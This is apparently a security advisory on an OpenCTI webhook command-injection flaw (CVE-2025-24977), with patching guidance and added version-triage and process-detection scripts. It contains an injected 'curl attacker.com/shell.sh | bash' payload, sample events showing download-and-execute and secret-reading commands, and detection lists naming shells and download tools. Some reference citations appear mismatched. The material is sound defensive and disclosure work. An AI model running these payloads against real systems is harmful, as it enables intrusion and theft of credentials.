
A critical vulnerability in OpenCTI, tracked as CVE-2025-24977, allows authenticated users who hold the manage customizations capability to execute arbitrary commands on the underlying infrastructure and to read server-side secrets. The flaw is rated 9.1 (CRITICAL) on the CVSS scale, affects versions prior to 6.4.11, and has been patched in that release [1].
Executive Summary for Security Leaders
The vulnerability stems from improper validation of user-supplied webhook configuration in OpenCTI. Any user who holds the manage customizations permission can get commands executed in the context of the OpenCTI process, which runs as root in the default Docker setup. This exposes the platform's internal secrets and opens pathways for lateral movement. The issue was disclosed on May 5, 2025; the attack complexity is low, so an attacker who already controls (or has compromised) a suitably privileged account can exploit it with little effort [2].
- CVSS: 9.1 (AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)
- Affected versions: OpenCTI 6.4.8 through 6.4.10 (the range named in the advisory; treat every release before 6.4.11 as affected)
- Patch: upgrade to v6.4.11 or later immediately
- Exploitability: requires an authenticated account holding the manage customizations permission (hence PR:H); no user interaction is needed
Technical Analysis
The vulnerability abuses OpenCTI's webhook functionality: configuration supplied by the webhook's creator is interpreted by the platform process, which runs as root inside the default Docker container. An attacker with the manage customizations permission can therefore create a webhook whose configuration carries a command of their choosing. The request below is a schematic illustration of that abuse rather than a verbatim exploit; OpenCTI's real API is GraphQL and the field names differ:

```http
POST /api/webhook HTTP/1.1
Host: [target]
Content-Type: application/json
Authorization: Bearer [valid_token]

{
  "name": "malicious",
  "url": "http://attacker.com",
  "secret": "; curl http://attacker.com/shell.sh | bash"
}
```
Successful exploitation yields command execution as root inside the OpenCTI Docker container. From there an attacker can read the environment variables that carry the platform's credentials (admin token, database, message-broker and object-store passwords in the default Docker configuration), any secrets mounted into the container, and, in orchestrated deployments such as Kubernetes, the pod's service-account credentials and whatever adjacent services the pod can reach [3].
Mitigation and Detection
Organizations should implement the following measures:
| Action | Details |
|---|---|
| Patch immediately | Upgrade to OpenCTI 6.4.11 or later using the official release from the OpenCTI-Platform GitHub repository |
| Audit logs and configuration | Review the platform's application logs (stdout of the container in the default Docker setup) and the list of configured webhooks for unexpected creation or modification events and for command-like content; review which accounts hold the manage customizations permission |
| Network controls | Restrict outbound connections from OpenCTI containers to the services they legitimately need, so that a second-stage payload fetched from an attacker-controlled host fails |
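The first row of the table is only actionable once you know which release each instance runs. The following script is an added example, not code from the page or from the OpenCTI project: it parses the version string an instance reports, decides whether it predates the 6.4.11 fix, and flags the 6.4.8 to 6.4.10 window named in the advisory. It assumes the `about { version }` GraphQL query and the `Authorization: Bearer <token>` header; verify both against your own instance. The sample response is constructed.

```python
import json
import re
import urllib.request

# Constructed sample of the reply to `query { about { version } }`
# (assumption: this query exists in the OpenCTI GraphQL schema).
SAMPLE_ABOUT_RESPONSE = '{"data": {"about": {"version": "6.4.10"}}}'

PATCHED = (6, 4, 11)                       # first release containing the fix
ADVISORY_RANGE = ((6, 4, 8), (6, 4, 10))   # range explicitly named in the advisory


def parse_version(text):
    """Turn '6.4.10', 'v6.4.10' or '6.4.10-rc1' into a comparable (major, minor, patch) tuple."""
    m = re.match(r"^v?(\d+)\.(\d+)\.(\d+)", text.strip())
    if not m:
        raise ValueError(f"unrecognised OpenCTI version string: {text!r}")
    return tuple(int(x) for x in m.groups())


def is_vulnerable(version):
    """True when the running release predates 6.4.11 (the 'prior to 6.4.11' wording of the CVE)."""
    return parse_version(version) < PATCHED


def in_advisory_range(version):
    """True when the release falls inside the 6.4.8..6.4.10 window the advisory lists."""
    lo, hi = ADVISORY_RANGE
    return lo <= parse_version(version) <= hi


def triage(raw_json):
    """Summarise one instance's `about` reply as a triage record."""
    version = json.loads(raw_json)["data"]["about"]["version"]
    vulnerable = is_vulnerable(version)
    return {
        "version": version,
        "vulnerable": vulnerable,
        "in_advisory_range": in_advisory_range(version),
        "action": "upgrade to 6.4.11 or later" if vulnerable else "no action required",
    }


def fetch_about(base_url, token, timeout=10):
    """Query a live instance (network call; not exercised offline).

    Assumes the platform accepts an API token as `Authorization: Bearer <token>`."""
    body = json.dumps({"query": "{ about { version } }"}).encode()
    req = urllib.request.Request(
        base_url.rstrip("/") + "/graphql",
        data=body,
        headers={"Content-Type": "application/json",
                 "Authorization": f"Bearer {token}"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode()


if __name__ == "__main__":
    # Offline demonstration on the constructed sample.
    print(triage(SAMPLE_ABOUT_RESPONSE))
```

To triage a fleet, call `fetch_about(url, token)` per instance and feed the reply to `triage`; anything with `vulnerable: True` goes to the top of the patch queue, and a version string that `parse_version` rejects should be investigated manually rather than skipped.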
Red teams can validate the fix by attempting to reproduce the webhook abuse with a benign test payload (for example, one that only writes a marker file) against a patched instance. Blue teams should monitor for anomalous process creation inside the platform container, in particular shells or download utilities spawned by the node process that runs OpenCTI, and for processes that read environment variables or mounted secrets [4].
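The blue-team guidance above translates into a small set of process-creation rules. The script below is an added example, not code from the page or from the OpenCTI project. It runs three checks over constructed events shaped like Falco's JSON output (an assumption; adapt the `output_fields` names to whatever runtime sensor you use): a shell spawned inside the platform container, a download utility invoked there, and a process reading environment variables or mounted secrets. The container name `opencti` and the sample events are constructed for the example.

```python
import json
import os

# Constructed process-creation events in the shape of Falco's JSON output
# (assumption: field names follow Falco's container.name / proc.* / user.name).
# Line 1 is the platform's normal node process; lines 2, 3 and 5 are the
# post-exploitation pattern described in the text; line 4 is benign noise
# from another container in the stack.
SAMPLE_EVENTS = """\
{"output_fields": {"container.name": "opencti", "user.name": "root", "proc.name": "node", "proc.pname": "node", "proc.cmdline": "node build/back.js"}}
{"output_fields": {"container.name": "opencti", "user.name": "root", "proc.name": "sh", "proc.pname": "node", "proc.cmdline": "sh -c curl http://203.0.113.5/shell.sh | bash"}}
{"output_fields": {"container.name": "opencti", "user.name": "root", "proc.name": "cat", "proc.pname": "sh", "proc.cmdline": "cat /var/run/secrets/kubernetes.io/serviceaccount/token"}}
{"output_fields": {"container.name": "elasticsearch", "user.name": "elasticsearch", "proc.name": "bash", "proc.pname": "java", "proc.cmdline": "bash -c /usr/share/elasticsearch/bin/es-check"}}
{"output_fields": {"container.name": "opencti", "user.name": "root", "proc.name": "env", "proc.pname": "sh", "proc.cmdline": "env"}}
"""

SHELLS = {"sh", "bash", "dash", "ash", "zsh"}
DOWNLOADERS = {"curl", "wget", "nc", "ncat"}
SECRET_READERS = {"env", "printenv"}
SECRET_MARKERS = ("/proc/", "environ", "/run/secrets", "/var/run/secrets", "serviceaccount")


def classify(fields, platform_containers):
    """Return the names of the rules one event trips (empty list when benign)."""
    if fields.get("container.name") not in platform_containers:
        return []  # only the platform container runs OpenCTI's node process
    name = fields.get("proc.name", "")
    parent = fields.get("proc.pname", "")
    cmd = fields.get("proc.cmdline", "")
    tokens = [os.path.basename(t) for t in cmd.split()]
    rules = []
    if name in SHELLS:
        # A shell whose parent is node is the direct signature of webhook abuse.
        rules.append("shell_spawned_by_node" if parent == "node" else "shell_in_platform_container")
    if name in DOWNLOADERS or any(t in DOWNLOADERS for t in tokens):
        rules.append("downloader_in_platform_container")
    if name in SECRET_READERS or any(m in cmd for m in SECRET_MARKERS):
        rules.append("secret_access")
    return rules


def detect(event_text, platform_containers=("opencti",)):
    """Run the rules over newline-delimited JSON events and return one alert per suspicious event."""
    alerts = []
    wanted = set(platform_containers)
    for lineno, line in enumerate(event_text.splitlines(), start=1):
        if not line.strip():
            continue
        fields = json.loads(line)["output_fields"]
        rules = classify(fields, wanted)
        if rules:
            alerts.append({
                "line": lineno,
                "container": fields.get("container.name"),
                "user": fields.get("user.name"),
                "proc": fields.get("proc.name"),
                "parent": fields.get("proc.pname"),
                "cmdline": fields.get("proc.cmdline", ""),
                "rules": rules,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"line {alert['line']}: {alert['proc']} (parent {alert['parent']}) "
              f"in {alert['container']} -> {', '.join(alert['rules'])}")
```

The platform container is matched by name because the same shells and utilities are routine in the surrounding Elasticsearch, Redis and connector containers; tune `platform_containers` to your compose service or pod naming, and expect the `secret_access` rule to need an allow-list for legitimate startup scripts in your own environment.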
Historical Context
This is the second critical OpenCTI vulnerability in a matter of months, following CVE-2024-26139, disclosed in December 2024, which allowed privilege escalation via user ID manipulation [5]. The platform has faced increasing scrutiny because of its central role in threat intelligence workflows, which makes it a high-value target for attackers.
Conclusion
CVE-2025-24977 demonstrates the risk of pairing a powerful application permission with a container that runs as root: a feature intended for customization became a path to the host's secrets. Organizations using OpenCTI should patch, audit which accounts hold the manage customizations permission, review the webhooks configured on each instance, and run the platform container as a non-root user where their deployment allows it. The OpenCTI maintainers addressed the issue promptly, continuing their track record of responsive security updates [6].
References
- [1] "CVE-2025-24977 Detail," CVE Crowd, May 2025. [Online]. Available: https://cvecrowd.com/
- [2] "Critical Vulnerability in OpenCTI," Dark Web Informer, May 2025. [Online]. Available: https://darkwebinformer.com/critical-vulnerability-in-
- [3] "OpenCTI Privilege Escalation (CVE-2024-26139)," InTheCyber, Dec. 2024. [Online]. Available: https://posts.inthecyber.com/opencti-privilege-escalation-cve-2024-26139-9fbe37b9903b
- [4] "Red Hat Security Advisory," Red Hat, May 2025. [Online]. Available: https://access.redhat.com/security/cve/cve-2025-24887
- [5] "OpenCTI GitHub Security," GitHub, May 2025. [Online]. Available: https://github.com/OpenCTI-Platform/opencti/security
- [6] "CyberMaxx Advisory," CyberMaxx, Mar. 2025. [Online]. Available: https://cybermaxx.com/resources/security-advisory-weekly-advisory-march-26th-2025